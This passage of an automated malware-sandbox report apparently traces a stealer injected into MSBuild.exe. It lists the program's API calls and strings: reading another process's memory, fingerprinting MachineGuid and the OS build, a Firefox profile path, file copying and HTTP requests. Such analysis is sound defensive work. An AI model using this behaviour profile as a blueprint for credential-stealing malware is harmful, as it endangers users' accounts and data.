                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcpy
                                                                                        • String ID: Stable\$firefox
                                                                                        • API String ID: 3722407311-3160656979
                                                                                        • Opcode ID: 701918741428e08192ed56033c5b19e1c3f78348f1f85b6fba9e072669bb6fa4
                                                                                        • Instruction ID: dc9232c6f18d92b7668f1a551db38a5b0db8dd03ba54f88d7fb460d1fcb80d8e
                                                                                        • Opcode Fuzzy Hash: 701918741428e08192ed56033c5b19e1c3f78348f1f85b6fba9e072669bb6fa4
                                                                                        • Instruction Fuzzy Hash: 97E12371A002049BCB24FF65D956EDE77B9BF44304F40C53EEC49AB691DB38AA08CB95
                                                                                        APIs
                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 0040F561
                                                                                        • OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000030), ref: 0040F588
                                                                                        • memset.MSVCRT ref: 0040F5E4
                                                                                        • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 0040F63C
                                                                                        • memset.MSVCRT ref: 0040F6CF
                                                                                        Strings
                                                                                        • N0ZWFt, xrefs: 0040F692
                                                                                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0040F5FA, 0040F6E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Processmemset$MemoryOpenRead
                                                                                        • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
                                                                                        • API String ID: 2048220554-1622206642
                                                                                        • Opcode ID: 94c5682253a37105a697971657c54386bbc5455e7de511139793b2f33be81175
                                                                                        • Instruction ID: a21cb42e5d324bd6ca82509aa78599428660c3814b2df02d38e35266ba1ec8a6
                                                                                        • Opcode Fuzzy Hash: 94c5682253a37105a697971657c54386bbc5455e7de511139793b2f33be81175
                                                                                        • Instruction Fuzzy Hash: 93613471E00215AAEB309BA5DC45BAFB7B4AF84314F14453AE408B72C1E77C9948CBA9
                                                                                        APIs
                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
                                                                                        • ??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
                                                                                        • lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
                                                                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CrackInternetlstrlen
                                                                                        • String ID: 5P@$<
                                                                                        • API String ID: 1274457161-3404980136
                                                                                        • Opcode ID: 60ed9ea01e3d07019788118dcee7b697ceaf86ecb3c6f670c601f99280d696c0
                                                                                        • Instruction ID: ffcd9b35b4bfddae0e9debaaaaff4d4a67ad705ebd42d737fa1e7e78837649a8
                                                                                        • Opcode Fuzzy Hash: 60ed9ea01e3d07019788118dcee7b697ceaf86ecb3c6f670c601f99280d696c0
                                                                                        • Instruction Fuzzy Hash: 23113071D00208ABDB04EFA5DC85BDDB7B8EB44314F10513AFA15B7291EF745505CB98
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00410365
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004201E9), ref: 00410382
                                                                                        • RegQueryValueExA.KERNEL32(004201E9,MachineGuid,00000000,00000000,00000000,000000FF), ref: 004103A4
                                                                                        • RegCloseKey.ADVAPI32(004201E9), ref: 004103AE
                                                                                        • CharToOemA.USER32(00000000,?), ref: 004103C2
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CharCloseOpenQueryValuememset
                                                                                        • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                        • API String ID: 2391366103-1211650757
                                                                                        • Opcode ID: e700b7023bf9e8dbd497fbb4e43d42ebc614438fbdd82c04f2954e56f97c9238
                                                                                        • Instruction ID: 782b84d42d0d06b912d34d3dac9a589f721f2d7cdf24700b86374e4a20e7c3f4
                                                                                        • Opcode Fuzzy Hash: e700b7023bf9e8dbd497fbb4e43d42ebc614438fbdd82c04f2954e56f97c9238
                                                                                        • Instruction Fuzzy Hash: E001D475A4030CBBDB60DB90DC4AFEEB778EB04700F100199F648A6081DBB46BC48B94
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 00405010: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
                                                                                          • Part of subcall function 00405010: StrCmpCA.SHLWAPI(?,0169A3B0,?,?,?,?,?,?,?), ref: 0040507A
                                                                                          • Part of subcall function 00405010: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
                                                                                          • Part of subcall function 00405010: HttpOpenRequestA.WININET(00000000,GET,?,0169B128,00000000,00000000,-00400100,00000000), ref: 004050DC
                                                                                          • Part of subcall function 00405010: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
                                                                                          • Part of subcall function 00405010: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412FFA
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 00413011
                                                                                          • Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC
                                                                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 00413039
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0041304E
                                                                                        • lstrlenA.KERNEL32(00000000), ref: 0041306B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                                                                        • String ID: ERROR
                                                                                        • API String ID: 3240024479-2861137601
                                                                                        • Opcode ID: c2d7594e3234da1f33466824e59ddf573229d6e823bcf9993492a33c190d25a3
                                                                                        • Instruction ID: bd4d237804207bf9bc1d7224717f3b297064a78b5ccb05320e04b95c877dc140
                                                                                        • Opcode Fuzzy Hash: c2d7594e3234da1f33466824e59ddf573229d6e823bcf9993492a33c190d25a3
                                                                                        • Instruction Fuzzy Hash: E43180329001046BCB24FF71DC569EE37A8AE54704F40813AFD0672592EF386B488BA8
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004105B5
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 004105BC
                                                                                          • Part of subcall function 0040FA60: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 0040FA75
                                                                                          • Part of subcall function 0040FA60: HeapAlloc.KERNEL32(00000000), ref: 0040FA7C
                                                                                          • Part of subcall function 0040FA60: RegOpenKeyExA.KERNEL32(80000002,01690838,00000000,00020119,?), ref: 0040FA9B
                                                                                          • Part of subcall function 0040FA60: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 0040FAB5
                                                                                          • Part of subcall function 0040FA60: RegCloseKey.ADVAPI32(?), ref: 0040FABF
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,01690838,00000000,00020119,00000000), ref: 004105F1
                                                                                        • RegQueryValueExA.KERNEL32(00000000,0169A710,00000000,00000000,00000000,000000FF), ref: 0041060C
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00410616
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                        • String ID: Windows 11
                                                                                        • API String ID: 3466090806-2517555085
                                                                                        • Opcode ID: a47b1fee11c922904502344837a3ea91d47d8b4281bde6fd73d92917b4b8e5ca
                                                                                        • Instruction ID: 6a00dca0351ba1f1b5825a2528416373370fab3b8fd5f0a2b799655d5a0aabf6
                                                                                        • Opcode Fuzzy Hash: a47b1fee11c922904502344837a3ea91d47d8b4281bde6fd73d92917b4b8e5ca
                                                                                        • Instruction Fuzzy Hash: 1201D67160020CBBD710EBA4EC49EBB777EEB44305F00516AFA09D7250D7B499808BE0
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 0040FA75
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040FA7C
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,01690838,00000000,00020119,?), ref: 0040FA9B
                                                                                        • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 0040FAB5
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0040FABF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                        • String ID: CurrentBuildNumber
                                                                                        • API String ID: 3466090806-1022791448
                                                                                        • Opcode ID: 7b7d1b79e19f05ca12c8064292c75d5cc37a930701fe9e474d57c854d10d4e52
                                                                                        • Instruction ID: a1553181ab18edaa3b94d53bb79d7bf4b62666c9831d6ad32faf63d23f73e213
                                                                                        • Opcode Fuzzy Hash: 7b7d1b79e19f05ca12c8064292c75d5cc37a930701fe9e474d57c854d10d4e52
                                                                                        • Instruction Fuzzy Hash: 98F062B5A41318BBD710ABE0AC0AFAB7B7DEB44755F002169FB05A6181D7B45A4087E1
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408), ref: 0040FEDE
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408,00000000), ref: 0040FEE5
                                                                                        • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0040FF05
                                                                                        • wsprintfA.USER32 ref: 0040FF2B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                        • String ID: %d MB$@
                                                                                        • API String ID: 3644086013-3474575989
                                                                                        • Opcode ID: c91f0ec11f474d8c1381f109a4bcd534d4041cf4b5121d99c497be17c465c294
                                                                                        • Instruction ID: af9ca1c618701aaf6e1e57e94b25e62574dec66522ec45beacafd1b49d2b4fa6
                                                                                        • Opcode Fuzzy Hash: c91f0ec11f474d8c1381f109a4bcd534d4041cf4b5121d99c497be17c465c294
                                                                                        • Instruction Fuzzy Hash: ACF062B1A40218ABE714ABA4DC0AFBE77ADFB01345F401129F706E61C0D7B89C0187E5
                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 004158D5
                                                                                        • RegOpenKeyExA.KERNEL32(80000001,01699CE8,00000000,00020119,?), ref: 004158F4
                                                                                        • RegQueryValueExA.ADVAPI32(?,0169A878,00000000,00000000,00000000,000000FF), ref: 00415918
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00415922
                                                                                        • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00415947
                                                                                        • lstrcatA.KERNEL32(?,0169A818), ref: 0041595B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                                                                        • String ID:
                                                                                        • API String ID: 2623679115-0
                                                                                        • Opcode ID: 9d24550046d12cef6d6a8430f06f5fcf17270119dd68565c0f59e3130cccedf6
                                                                                        • Instruction ID: b2658f5a2186259637989032082ab400ffc55dd45aba0fd3878622be2ef6c76c
                                                                                        • Opcode Fuzzy Hash: 9d24550046d12cef6d6a8430f06f5fcf17270119dd68565c0f59e3130cccedf6
                                                                                        • Instruction Fuzzy Hash: BD41A3B5900208ABCF24EFA1CC46FDE3739AB85304F40865DFA5566191DB746AC8CFE5
                                                                                        APIs
                                                                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
                                                                                        • GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
                                                                                        • LocalFree.KERNEL32(?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CA9
                                                                                        • CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                        • String ID:
                                                                                        • API String ID: 2311089104-0
                                                                                        • Opcode ID: f92c717aaf7597c66bfacc60d54a838b8fdc52d17d646df18638fdf46865ad5a
                                                                                        • Instruction ID: 5b08f293fa4d369547e293c080fd62cfee42250c67ac5e0144c02d8e3dd3972c
                                                                                        • Opcode Fuzzy Hash: f92c717aaf7597c66bfacc60d54a838b8fdc52d17d646df18638fdf46865ad5a
                                                                                        • Instruction Fuzzy Hash: B011AF71604209AFEB10DF64DC85EBB77BEEB80344F10513EFA42A7290DB389D518BA4
                                                                                        APIs
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AA20), ref: 00417748
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AB10), ref: 00417761
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AB28), ref: 00417779
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168A930), ref: 00417791
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168EE38), ref: 004177AA
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,01696630), ref: 004177C2
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,01696610), ref: 004177DA
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168A978), ref: 004177F3
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AAC8), ref: 0041780B
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AA50), ref: 00417823
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,0168AA68), ref: 0041783C
                                                                                          • Part of subcall function 004176E0: GetProcAddress.KERNEL32(74DD0000,016964F0), ref: 00417854
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 0040FAE0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
                                                                                          • Part of subcall function 0040FAE0: HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
                                                                                          • Part of subcall function 0040FAE0: GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 00417672
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00417681
                                                                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00417697
                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004176B1
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004176BF
                                                                                        • ExitProcess.KERNEL32 ref: 004176C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: AddressProc$Eventlstrcpy$CloseHandleHeapOpenProcess$AllocCreateExitNameUserlstrcatlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 1749527509-0
                                                                                        • Opcode ID: 1bdeba99335991e6f9bdbcc5571e6edad701c08b7eb7378d217687897852acd7
                                                                                        • Instruction ID: 13c05977e48a492468067969b5632ac7cddf019cfab1cdc1380e7e7caaa560eb
                                                                                        • Opcode Fuzzy Hash: 1bdeba99335991e6f9bdbcc5571e6edad701c08b7eb7378d217687897852acd7
                                                                                        • Instruction Fuzzy Hash: 11213B71A001087BDB14FBB1DC56FEE7378AF10704F50513AB606B24D2EF786A088AA9
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                          • Part of subcall function 00410B80: GetSystemTime.KERNEL32(004201E9,0168FCC0,004201E9,?,00000030,004201E9,004201E9,?,00000000,?,?,004176BE), ref: 00410BA9
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F940: lstrcpyA.KERNEL32(00000000,?,00000000,004176BE), ref: 0040F981
                                                                                          • Part of subcall function 0040F940: lstrcatA.KERNEL32(00000000), ref: 0040F98D
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040976A
                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409734
                                                                                          • Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878
                                                                                          • Part of subcall function 004110F0: memset.MSVCRT ref: 0041110A
                                                                                          • Part of subcall function 004110F0: GetProcessHeap.KERNEL32(00000000,000000FA,00000000,00000000,?,00409753,00409C77), ref: 0041113D
                                                                                          • Part of subcall function 004110F0: HeapAlloc.KERNEL32(00000000,?,00409753,00409C77), ref: 00411144
                                                                                          • Part of subcall function 004110F0: wsprintfW.USER32 ref: 00411153
                                                                                          • Part of subcall function 004110F0: OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 004111BB
                                                                                          • Part of subcall function 004110F0: TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 004111CA
                                                                                          • Part of subcall function 004110F0: CloseHandle.KERNEL32(00000000,?,?), ref: 004111D1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: lstrcpy$Process$CopyFileHeaplstrcat$AllocCloseHandleOpenSystemTerminateTimelstrlenmemsetwsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3536976966-0
                                                                                        • Opcode ID: 48038416943861244995db3fe22c3c07c1ac8d57abec220332203bf17e321ea3
                                                                                        • Instruction ID: 59642c9a9299a7c4d39bed30f6b85666f3aa0001a0dfc23d3a4e96657f843de5
                                                                                        • Opcode Fuzzy Hash: 48038416943861244995db3fe22c3c07c1ac8d57abec220332203bf17e321ea3
                                                                                        • Instruction Fuzzy Hash: 8491EB72910108ABCB14FBA1DC56DEE7379AF54304F50813EF506B65E2EF386A0DCA69
                                                                                        APIs
                                                                                        • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000030,?,0041B1A9,?,?,?,00000000), ref: 0041A035
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,0041B1A9,00000080,00000000,00000000,00000030,?,0041B1A9,?,?,?,00000000), ref: 0041A06F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CreatePointer
                                                                                        • String ID:
                                                                                        • API String ID: 2024441833-0
                                                                                        • Opcode ID: 772bf794a0539b62a801477fbb62bcb276aa9b4d2b65757f9edafb53a070daec
                                                                                        • Instruction ID: ed9b1ade8afe9e764bcb327c8eb7a8881111bfc1a91da69b80f20d04efd87e30
                                                                                        • Opcode Fuzzy Hash: 772bf794a0539b62a801477fbb62bcb276aa9b4d2b65757f9edafb53a070daec
                                                                                        • Instruction Fuzzy Hash: 10419472505704AFE7309F28A8C0BA7BBD8E754328F108A2FF159C6641D275DCD48B69
                                                                                        APIs
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C57C947
                                                                                        • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C57C969
                                                                                        • GetSystemInfo.KERNEL32(?), ref: 6C57C9A9
                                                                                        • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C57C9C8
                                                                                        • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C57C9E2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2382968484.000000006C561000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C560000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_6c560000_MSBuild.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$AllocInfoSystem$Free
                                                                                        • String ID:
                                                                                        • API String ID: 4191843772-0
                                                                                        • Opcode ID: 4b2ddb7b85e140370599d71ccc26e1fa0834c1e943105370711dbe12e60bcd4d
                                                                                        • Instruction ID: f150fbe94d8c1e832a2ab845f3b7c344a1ed1b28baa67eae20739e333a8acc35
                                                                                        • Opcode Fuzzy Hash: 4b2ddb7b85e140370599d71ccc26e1fa0834c1e943105370711dbe12e60bcd4d
                                                                                        • Instruction Fuzzy Hash: 1621FC31741318ABDB94AE64DC84BAE777AAF8A704F510519F903A7740EB707C4087A9
                                                                                        APIs
                                                                                        • CoCreateInstance.OLE32(00424770,00000000,00000001,004238C4,00410847,00000000,00000000,00000030,00410847,00000030,?,00000001,?,00000030,00000000,00000000), ref: 0041066D
                                                                                        • SysAllocString.OLEAUT32(?), ref: 0041067B
                                                                                        • _wtoi64.MSVCRT ref: 004106BA
                                                                                        • SysFreeString.OLEAUT32(?), ref: 004106D9
                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 004106E0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: String$Free$AllocCreateInstance_wtoi64
                                                                                        • String ID:
                                                                                        • API String ID: 1817501562-0
                                                                                        • Opcode ID: 43ba9061f7aaa9e19d061b62b181f6edba0a93b387e1e1e93ae49384c182bd82
                                                                                        • Instruction ID: e53d099b401adf85f62220e949137e4eb195d033f19141da227454a58e436e12
                                                                                        • Opcode Fuzzy Hash: 43ba9061f7aaa9e19d061b62b181f6edba0a93b387e1e1e93ae49384c182bd82
                                                                                        • Instruction Fuzzy Hash: C121ADB1A40259AFCB00DFA8CC81AEEBBB9EF89310F10856AF509D7350C7359941CBA4
                                                                                        APIs
                                                                                          • Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410228
                                                                                        • Process32First.KERNEL32(00000000,00000128), ref: 00410238
                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0041024A
                                                                                          • Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,0168EE78,?,00423414,?,00000000,004201E9), ref: 0040F9B9
                                                                                          • Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
                                                                                          • Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB
                                                                                          • Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930
                                                                                        • Process32Next.KERNEL32(00000000,00000128), ref: 0041029E
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004102A9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process32lstrcpy$Next$CloseCreateFirstHandleSnapshotToolhelp32lstrcatlstrlen
                                                                                        • String ID:
                                                                                        • API String ID: 562399079-0
                                                                                        • Opcode ID: 6641976aa709788164a1774861f524becb7537c5be8e138fdb7114088aa02426
                                                                                        • Instruction ID: b719f9b5f692b2ac1a9fa5fbc0615dd86b5ea1c9724ba4ed1b36593775d07faa
                                                                                        • Opcode Fuzzy Hash: 6641976aa709788164a1774861f524becb7537c5be8e138fdb7114088aa02426
                                                                                        • Instruction Fuzzy Hash: 111194326001186BDB15EB56DC06BFE737DAF84B00F00417EF605E2191DF785A4A8BE9
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040FD45
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 0040FD4C
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,01690790,00000000,00020119,00000000), ref: 0040FD6B
                                                                                        • RegQueryValueExA.KERNEL32(00000000,01699B08,00000000,00000000,00000000,000000FF), ref: 0040FD86
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040FD90
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.2343717434.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
                                                                                        Yara matches
                                                                                        Similarity
